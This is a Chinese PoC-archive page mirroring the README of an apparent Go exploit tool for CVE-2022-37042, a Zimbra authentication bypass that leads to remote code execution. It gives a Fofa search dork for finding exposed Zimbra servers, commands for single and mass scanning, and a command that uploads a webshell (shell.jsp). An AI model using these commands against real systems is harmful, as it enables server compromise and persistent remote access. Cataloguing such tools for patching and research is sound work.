目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2022-37042 PoC — Zimbra Collaboration Suite 路径遍历漏洞

来源
https://github.com/0xf4n9x/CVE-2022-37042
关联漏洞
标题:Zimbra Collaboration Suite 路径遍历漏洞 (CVE-2022-37042)
Description:Zimbra Collaboration Suite(ZCS)是美国Zimbra的一款开源协同办公套件。该产品包括WebMail、日历、通信录等。 Zimbra Collaboration Suite 8.8.15版本、9.0版本存在路径遍历漏洞。攻击者利用该漏洞可以将任意文件上传到系统,从而导致目录遍历和远程代码执行。
Description
CVE-2022-37042 Zimbra Auth Bypass leads to RCE
介绍
# CVE-2022-37042

## Usage

查看漏洞信息。

```bash
go run main.go -s

_______    ________    ___   ____ ___  ___       ______________  __ __ ___
/ ____/ |  / / ____/   |__ \ / __ \__ \|__ \     |__  /__  / __ \/ // /|__ \
/ /    | | / / __/________/ // / / /_/ /__/ /_____ /_ <  / / / / / // /___/ /
/ /___  | |/ / /__/_____/ __// /_/ / __// __/_____/__/ / / / /_/ /__  __/ __/
\____/  |___/_____/    /____/\____/____/____/    /____/ /_/\____/  /_/ /____/

							@_0xf4n9x_

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

[INF] VulnInfo:
{
  "Name": "CVE-2022-37042 Zimbra Auth Bypass leads to RCE",
  "VulID": [
    "CVE-2022-37042"
  ],
  "Version": "1.0",
  "Author": "0xf9",
  "VulDate": "2022-10-07",
  "References": [
    "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
    "https://nvd.nist.gov/vuln/detail/CVE-2022-37042"
  ],
  "AppName": "Zimbra",
  "AppPowerLink": "https://www.zimbra.com/",
  "AppVersion": "Zimbra Collaboration Suite 8.8.15 and 9.0",
  "VulType": "RCE",
  "Description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"zimbra-邮件系统\" \u0026\u0026 (protocol=\"http\" || protocol=\"https\")",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}
```

对单个目标URL进行漏洞检测。

```bash
go run main.go -u http://example.com
```

```bash
echo 'http://example.com' | go run main.go
```

对多个目标进行批量漏洞验证。

```bash
go run main.go -l urls.txt
```

```bash
echo 'app="zimbra-邮件系统" && (protocol="http" || protocol="https")' | fofax -ffi -fs 500 | go run main.go
```

对单个目标进行漏洞利用,上传webshell文件。

```bash
go run main.go -u http://example.com -uf shell.jsp
```

## References

https://github.com/projectdiscovery/nuclei-templates/pull/5134

https://github.com/zer0yu
文件快照

 [4.0K]  /data/pocs/0769fb20391d7915f7ad90c1b62738e9f7dbe9d1
├── [ 473]  go.mod
├── [4.0K]  go.sum
├── [ 12K]  main.go
├── [2.3K]  README.md
└── [ 545]  shell.jsp

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。